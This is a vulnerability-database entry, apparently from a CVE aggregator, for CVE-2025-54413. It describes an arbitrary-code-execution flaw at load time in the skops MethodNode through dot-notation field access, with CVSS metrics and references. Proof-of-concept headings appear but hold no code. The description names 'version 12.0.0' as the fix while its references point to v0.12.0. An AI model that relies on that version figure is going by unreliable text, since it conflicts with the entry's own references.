	security-advisories@github.com	https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "skops is a Python library which helps users share and ship their scikit-learn based models. Versions 0.11.0 and below contain an inconsistency in MethodNode, which can be exploited to access unexpected object fields through dot notation. This can be used to achieve arbitrary code execution at load time. While this issue may seem similar to GHSA-m7f4-hrc6-fwg3, it is actually more severe, as it relies on fewer assumptions about trusted types. This is fixed in version 12.0.0."
    },
    {
      "lang": "es",
      "value": "skops es una librer\u00eda de Python que ayuda a los usuarios a compartir y enviar sus modelos basados en scikit-learn. Las versiones 0.11.0 y anteriores contienen una inconsistencia en MethodNode, que puede explotarse para acceder a campos de objeto inesperados mediante la notaci\u00f3n de puntos. Esto permite la ejecuci\u00f3n de c\u00f3digo arbitrario en tiempo de carga. Si bien este problema puede parecer similar a GHSA-m7f4-hrc6-fwg3, en realidad es m\u00e1s grave, ya que se basa en menos suposiciones sobre los tipos de confianza. Esto se solucion\u00f3 en la versi\u00f3n 12.0.0."
    }
  ],
  "id": "CVE-2025-54413",
  "lastModified": "2025-07-29T14:14:55.157",
  "metrics": {
    "cvssMetricV40": [
      {
        "cvssData": {
          "Automatable": "NOT_DEFINED",
          "Recovery": "NOT_DEFINED",
          "Safety": "NOT_DEFINED",
          "attackComplexity": "LOW",
          "attackRequirements": "PRESENT",
          "attackVector": "LOCAL",
          "availabilityRequirement": "NOT_DEFINED",
          "baseScore": 8.7,
          "baseSeverity": "HIGH",
          "confidentialityRequirement": "NOT_DEFINED",
          "exploitMaturity": "NOT_DEFINED",
          "integrityRequirement": "NOT_DEFINED",
          "modifiedAttackComplexity": "NOT_DEFINED",
          "modifiedAttackRequirements": "NOT_DEFINED",
          "modifiedAttackVector": "NOT_DEFINED",
          "modifiedPrivilegesRequired": "NOT_DEFINED",
          "modifiedSubAvailabilityImpact": "NOT_DEFINED",
          "modifiedSubConfidentialityImpact": "NOT_DEFINED",
          "modifiedSubIntegrityImpact": "NOT_DEFINED",
          "modifiedUserInteraction": "NOT_DEFINED",
          "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
          "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
          "modifiedVulnIntegrityImpact": "NOT_DEFINED",
          "privilegesRequired": "NONE",
          "providerUrgency": "NOT_DEFINED",
          "subAvailabilityImpact": "HIGH",
          "subConfidentialityImpact": "HIGH",
          "subIntegrityImpact": "HIGH",
          "userInteraction": "ACTIVE",
          "valueDensity": "NOT_DEFINED",
          "vectorString": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:A/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
          "version": "4.0",
          "vulnAvailabilityImpact": "HIGH",
          "vulnConfidentialityImpact": "HIGH",
          "vulnIntegrityImpact": "HIGH",
          "vulnerabilityResponseEffort": "NOT_DEFINED"
        },
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2025-07-26T04:16:06.793",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://drive.google.com/drive/folders/1bmVV18mnPbWy21hVYgf51yVJpf78vtB_?usp=sharing"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/skops-dev/skops/commit/0aeca055509dfb48c1506870aabdd9e247adf603"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/skops-dev/skops/releases/tag/v0.12.0"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/skops-dev/skops/security/advisories/GHSA-4v6w-xpmh-gfgp"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/skops-dev/skops/security/advisories/GHSA-m7f4-hrc6-fwg3"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Awaiting Analysis",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-351"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2025-54413 (GCVE-0-2025-54413)

GHSA-4V6W-XPMH-GFGP

Summary

Details

Proof of Concept (PoC)

Components Used in the Exploit

Exploit Logic (Python Equivalent)

What is shown when loading the model

Attachments

Impact

FKIE_CVE-2025-54413

Tags

Sightings

Nomenclature